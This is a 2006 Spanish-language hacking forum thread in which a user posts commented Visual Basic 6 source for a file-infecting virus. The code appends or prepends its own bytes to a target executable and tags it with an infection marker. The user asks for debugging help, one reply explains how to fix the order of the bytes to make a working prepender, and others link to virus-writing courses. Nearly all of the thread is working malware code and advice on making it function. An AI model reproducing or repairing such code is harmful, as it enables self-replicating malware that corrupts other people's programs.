Infección de ejecutables !¡!

ジ · 27 Junio 2006, 21:52 PM

buenas, pues consigo infectar el archivo pero, cuando ejecuto el file infectado, se ejecuta correctamente sin haun haberlo regenerado..pero no ejecuta mi virus, segun un tuto de override dice el: que nuestro huesped despues de infectarlo con el methodo prepender...no se ejecutara sin generarlo $:-\$ OK..pero entonces como carajo..lo infecto..y luego el husped se ejecuta $:-\$ ..claro que el virus NO se ejecuta pero el husped si..bueno tengo un lio, pongo el codigo y lo comento, y me dicen porfavor si hay algo que no entiendo, pero bueno entiendo todo lo que es la funcion de infectar, que no hay mas codigo x el momento, es un proyecto aparte para aprender este metodo de infecion.

Código [Seleccionar]

Private Const PV = 12288  ' contstante donde meto el peso de mi virus
Option Explicit

Private Sub Form_Load()
infect ("C:\Packman.exe")  ' infect..la funcion..pakman + ruta..esta claro
End Sub

Private Sub Timer1_Timer()
MsgBox " soy el codigo del virus"         ' un timer...que no mas es d ejemplo
Me.Caption = "soy el caption del virus"
MsgBox " soy otra parte del codigo"
Me.Caption = "yo tb ;) "
End Sub

Private Function infect(fileainfectar As String) As Boolean
Dim buffer As String  ' una variable que la vamos a usar como buffer para almasenar el peso del husped
Dim viruspv As String




Open fileainfectar For Binary Access Read As #1  ' abrimos el file a infectar el huesped para leer dedatos
buffer = Space(LOF(1))  ' en la val, buffer le decimos LOF(1) = al peso del huesped
Get #1, , buffer   'leemos en el canal uno la variable buffer
Close #1 'cerramos

If (Right(buffer, 2) <> "xD") Then ' una condicion, le añadimos a buffer en los dos últimos bytes de la app una marka viral para saber si el file esta infectao y entonces infectarlo
MsgBox "el archivo no esta markado x lo tanto no esta infectado, vamos a infectarlo ;)"

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #2  ' nos abrimos a nosotros mismo ( al virus en el canal2 )
viruspv = Space(PV)  ' en viruspv ( peso del virus ) metemos PV la constante k tiene todo nuestro peso
Get #2, , viruspv  'leemos los datos de la val, viruspv
Close #2 'ceramos 


Open fileainfectar For Binary Access Write As #3  'abrimos el huesped para infectarlo, "Write" para escribir ene l una serie d datos
Put #3, , buffer  ' ponemos/ecsribimos los datos de la val, buffer
Put #3, , viruspv  ' lo mismo con el peso del virus
Put #3, , "xD"  ' y la marka de infecion
Close #3  'cerramos

Else ' un else--.--
MsgBox " el file que queremos infectar tiene nuestra MARKA...esta infectado, provemos con otro ;)"

End If

End Function

Robokop · 28 Junio 2006, 00:32 AM

Código [Seleccionar]


Open fileainfectar For Binary Access Write As #3  'abrimos el huesped para infectarlo, "Write" para escribir ene l una serie d datos
Put #3, , buffer  ' ponemos/ecsribimos los datos de la val, buffer
Put #3, , viruspv  ' lo mismo con el peso del virus
Put #3, , "xD"  ' y la marka de infecion
Close #3  'cerramos

es alreves primero pones el source del virus y luego el buffer......

~~ · 2 Julio 2006, 01:14 AM

Hola AililiA.

Citarsegun un tuto de override dice el: que nuestro huesped despues de infectarlo con el methodo prepender...no se ejecutara sin generarlo

Te importariaponerellink del tuto??? Es q me interesa el tema...

1 Saludo y gracias

<--v1c1ous--> · 2 Julio 2006, 20:56 PM

.:Infección de ejecutables en VB.Net:.
http://foro.elhacker.net/index.php/topic,125970.0.html

Taller de Virus en Visual Basic 6 - Temario.
http://foro.elhacker.net/index.php/topic,79326.0.html

Curso/Taller de Virus en Visual Basic 6 - release
http://foro.elhacker.net/index.php/topic,107763.0.html

~~ · 4 Julio 2006, 13:31 PM

Hola

Muxas gracias por los vínculos hotmail_pop3, unos cursos realmente wenos (recomiendo encarecidamente el último, excelente

)

Gracias de nuevo, 1saludo

Test Foro de elhacker.net SMF 2.1

Infección de ejecutables !¡!

ジ

Robokop

~~

<--v1c1ous-->

~~